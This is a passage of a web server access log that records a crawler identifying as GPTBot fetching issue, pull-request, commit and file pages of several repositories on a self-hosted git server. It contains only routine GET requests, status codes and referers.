+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:58:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:58:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2flocalpycs%2fstruct.pyc" [Client 74.7.227.38] [Length 19806] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/struct.pyc" +[17/Feb/2026:17:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:17:58:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:17:58:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:17:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12789] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" +[17/Feb/2026:17:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:17:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10732] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:17:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:58:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:17:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr 